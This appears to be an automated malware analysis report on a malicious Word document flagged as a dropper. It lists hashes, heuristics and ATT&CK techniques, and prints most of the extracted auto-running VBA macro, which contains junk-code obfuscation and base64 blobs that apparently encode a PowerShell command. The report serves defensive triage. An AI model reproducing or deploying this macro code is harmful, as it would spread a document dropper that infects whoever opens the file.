Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cacda69378396423…

MALICIOUS

Office (OLE)

126.0 KB Created: 2018-08-21 19:39:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 29f849eedfcb01e988d5b61c679bed57 SHA-1: d4876415d21613350bc875fb3a2a536f133bf1f4 SHA-256: cacda69378396423259ee3702e2812b4193e1d8592c9a358d10165971d47fc14
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro, which is commonly used to execute downloaded payloads. The 'Document_Open' macro suggests automatic execution upon opening the document. The ClamAV detection name 'Doc.Dropper.Agent-6957340-0' further supports its nature as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6957340-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6957340-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20229 bytes
SHA-256: 1afa3e86dac67787ee18735fb187f7727e9ddadbef614c2f9e8cdc71e7c9cb73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
If 23 < 153 Then
' rRXLqb9k
Else
' bYmjxqoM
MsgBox "hOXmCz"
End If
If 41 * 20 = 1507 - 1492 Then
UDRU1Pvc3 = "dy2NZ"
End If
RqwpncQ = 16007
HM13Kiqo = UDRU1Pvc3 & RqwpncQ
Y9oX0 = "WTI5a2"
n0KtjR = "FXNW5YVG82VlZSR09DNUhaWFJUZEhKcGJtY29XMU41YzNSbGJTNURiMjUyWlhKMFhUbzZSbkp2YlVKaGMyVTJORk4wY21sdV"
iglhm3Cw5 = "p5Z2tZMjlrWlNrcE8zUnllWHRwWlhnb0pHSmhjMlUyTkNrN2ZXTmhkR05vZTNkeWFYUmxMV2h2YzNRZ0pGOHVaWGhqWlhCMGFXOXVMbTFsYzNOaFoyVTdmUT09"
If 35 * 29 = 1075 - 1065 Then
ufXhc = "zixAzX"
End If
JAeut41 = "hrLoeUN3E"
mtKguQ = ufXhc & JAeut41
If 35 * 29 = 1075 - 1065 Then
dRnwg = "Qs1642yHI"
End If
GjeTpk = 64585
GDKT8 = dRnwg & GjeTpk
Dim ufE6w
ufE6w = Y9oX0 & n0KtjR & iglhm3Cw5
Rb5makF = "Y0c5M1pYSnphR1ZzYkNBa1kyOWtaU0E5SUNkS1NFSm9aRWRuWjFCVFFXbE1hVFZqWTBoV01HUklhM1ZhV0doc1NXcHpaMHBJWkdwSlJEQm5ZbTFXTTB4WE9Xb"
uCunYNe5U = "GhiVlpxWkVOQ2RWcFlVWFZrTWxacFdUSjRjRnBYTlRCUGVVRnJaREpOZFZwSE9UTmliWGgyV1ZkU2JXRlhlR3hMUTBwdlpFaFNkMDlwT0haa2JrNXlaVmRPZVZwWFJqQmhWemwxWTNrMWFtSXlNSFprV0VKcldWaFNiRmg2UlhWTlJFbDFXbGhvYkVscGQyZEtTRUpvWkVkbmNFOTVRbnBrUjBaNVpFTXhkMk50T1dwYVdFNTZTVU5TZDFsWVVtOVBkejA5Snpza1ltRnpaVFkwSUQwZ1cxTjVjM1JsYlM1VVpYaDBMa1Z1"
If 26564 / 116 = -4805 + 4810 Then
p0EwBQDZ = "tcKZuV"
End If
t3IhV4 = 37112
xz1enc7DS = p0EwBQDZ & t3IhV4
If 26564 / 116 = -4805 + 4810 Then
Ld2mf = "NxN063"
End If
gJMq0U = "iM4cB"
bbcOJS = Ld2mf & gJMq0U
Dim fh3TI
fh3TI = Rb5makF & uCunYNe5U
Dim Ov3UReVm9
Ov3UReVm9 = 180
While Ov3UReVm9 <= 989
Ov3UReVm9 = Ov3UReVm9 + 28
Wend
OoYHA = "OzvXsPFJR"
Y9bwp = OdCwe & Ov3UReVm9
ALVd5iS = fh3TI & ufE6w
If 60 < 249 Then
' hWFVJsi
Else
' gG98HAFD
MsgBox "U1z4jcw"
End If
If 60 < 249 Then
' XNnJ0R91
Else
' YIKvi
MsgBox "B8mIakQ"
End If
If 557 + 42 = -3564 + 3573 Then
L7abYJ3N = "SGwsvRTyl"
End If
b0e1l = 60970
MAkoK4 = L7abYJ3N & b0e1l
If 913 + 8 = -887 + 901 Then
VuxZ01 = "YJYhs8"
End If
bM6CLp95v = 49749
kKvs9dTm = VuxZ01 & bM6CLp95v
If 913 + 8 = -887 + 901 Then
ERXExK72 = "mZR6LTV23"
End If
qmydU = "KtNr2u"
Jg57b1V = ERXExK72 & qmydU
Call Stalin(ALVd5iS)
End Sub

Attribute VB_Name = "TetEf"
Sub Stalin(BdEgBu6Y)
If 625 - 4 = -1525 + 1538 Then
RO271AKth = "WD89cpvsG"
End If
HtqbOSij0 = "k6ESx5kO2"
R6H3rV = RO271AKth & HtqbOSij0
If 42 < 206 Then
' lItSB
Else
' ySBPN1
Debug.Print "zPX0F"
End If
If 461 - 58 = 11352 / 946 Then
R6Iig = "GTNMd4"
End If
f2Nguyp = 50341
ky4NuTEY = R6Iig & f2Nguyp
If 53 < 137 Then
' ykeWRXFxP
Else
' eoFVGPc
Debug.Print "P7uG32NlT"
End If
If 46 < 165 Then
' h8mgoQR
Else
' ZKqGOI
MsgBox "W4ikW"
End If
If 24 < 183 Then
' QDWTqyxnw
Else
' JqwL46P0
Debug.Print "af4aRe1"
End If
If 261 - 82 = 13656 / 2276 Then
w8Kaw = "iv6Yjq"
End If
GPChQr0O = 29416
LBTmFA = w8Kaw & GPChQr0O
If 20 < 252 Then
' DgnCd5pmG
Else
' fqB2d3JVT
Debug.Print "okNCZL3VA"
End If
If 39 < 170 Then
' abeKoC
Else
' szMHy8j
MsgBox "t4She5I"
End If
If 39 < 170 Then
' Iau6vFb
Else
' it8wUgf
MsgBox "Nydpu9S"
End If
Dim E2mFy
E2mFy = 204
While E2mFy < 318
E2mFy = E2mFy + 32
Wend
oDqofNGsA = 41355
kUNo4C = ykvJ4 & E2mFy
If 16 < 245 Then
' q0lUO
Else
' sQB3iAFSs
Debug.Print "e5qLBS"
End If
If 31083 / 39 = 8752 / 1094 Then
uedgxW = "JYxDtZ"
End If
XgPRF035 = 13544
BAqhC = uedgxW & XgPRF035
If 59 < 132 Then
' l1nKyY
Else
' UBinp8QtC
MsgBox "UiOvDnu"
End If
If 867 - 26 = -871 + 883 Then
DIWc5kZ = "t1ylG8"
End If
iTVjB = "gafuUIP"
rej3u7Qob = DIWc5kZ & iTVjB
If -53 + 168 = 2414 - 2406 Then
u5ghbJ = "cLYse63o9"
End If
xqF9w = 18288
OkeNCV = u5ghbJ & xqF9w
Dim f98hZD
f98hZD = 194
While f98hZD < 988
f98hZD = f98hZD + 58
Wend
bAaUw = "UcSoh4"
n3AbW0 = Nonw9pyA & f98hZD
If 306 - 82 = 13986 / 999 Then
B6k4XS = "ywHbW"
End If
mYnXd4Wlr = "cR6JvgZsh"
e3Tutxm = B6k4XS & m
... (truncated)